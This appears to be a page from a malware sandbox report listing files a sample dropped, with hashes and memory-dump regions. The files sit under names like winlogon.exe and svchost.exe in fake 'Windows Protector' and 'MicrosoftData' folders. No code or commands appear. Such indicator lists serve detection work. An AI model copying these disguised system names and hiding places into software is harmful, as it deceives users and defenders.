\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe

Filesize
37KB

MD5
379528dce8b0f2cc61ff99a3df2a9928

SHA1
58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2

SHA256
874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141

SHA512
b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

Filesize
30KB

MD5
81b88e00b20c4fc25b4cc37c76183d25

SHA1
e49c1133657c6a37699e4a88702169218f0cb209

SHA256
267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

SHA512
055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

Download Submit
\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe

Filesize
28KB

MD5
10d4fb7e4295a4a518aa9355db980e5d

SHA1
1974f67c6fc402b1aa805b5bdf628b045349016b

SHA256
e716064b119002efcbe4389cf49eb737be4ff37a515ab87dedb7ab834c975cf5

SHA512
ee5106defd6b63b38ce10869c227c16fc07fe19bdd4a5255dff50155b6ab2d2861fb363b536c276fae597d796c87ed47b4834ecce60277c6c73b02b00c9e3d1c

Download Submit
memory/272-150-0x00000000FF3E1000-0x00000000FF3E3000-memory.dmp

Filesize
8KB

Download
memory/864-232-0x000000013F3E0000-0x000000013FBA8000-memory.dmp

Filesize
7.8MB

Download
memory/864-224-0x0000000002040000-0x0000000002808000-memory.dmp

Filesize
7.8MB

Download
memory/1512-55-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1512-54-0x000007FEF4410000-0x000007FEF4E33000-memory.dmp

Filesize
10.1MB

Download
memory/2020-73-0x0000000001080000-0x000000000108C000-memory.dmp

Filesize
48KB

Download
memory/2020-75-0x00000000756A1000-0x00000000756A3000-memory.dmp

Filesize
8KB

Download
memory/2056-81-0x0000000000DD0000-0x0000000000DDC000-memory.dmp

Filesize
48KB

Download
memory/2056-83-0x00000000005E0000-0x00000000005EE000-memory.dmp

Filesize
56KB

Download
memory/2056-85-0x00000000009D0000-0x00000000009DA000-memory.dmp

Filesize
40KB

Download
memory/2056-84-0x0000000000630000-0x000000000063A000-memory.dmp

Filesize
40KB

Download
memory/2056-138-0x0000000000DA0000-0x0000000000DC2000-memory.dmp

Filesize
136KB

Download
memory/2296-155-0x000000006F1E0000-0x000000006F78B000-memory.dmp

Filesize
5.7MB

Download
memory/2296-185-0x000000006F1E0000-0x000000006F78B000-memory.dmp

Filesize
5.7MB

Download
memory/2504-184-0x00000000FF401000-0x00000000FF403000-memory.dmp

Filesize
8KB

Download
memory/2652-94-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-91-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-96-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-87-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-90-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-89-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2652-86-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2688-225-0x000000013F480000-0x000000013FC48000-memory.dmp

Filesize
7.8MB

Download
memory/2688-229-0x000000013F480000-0x000000013FC48000-memory.dmp

Filesize
7.8MB

Download
memory/2688-228-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2688-223-0x0000000000200000-0x0000000000220000-memory.dmp

Filesize
128KB

Download
memory/2788-129-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/2788-231-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3012-181-0x00000000FF541000-0x00000000FF543000-memory.dmp

Filesize
8KB

Download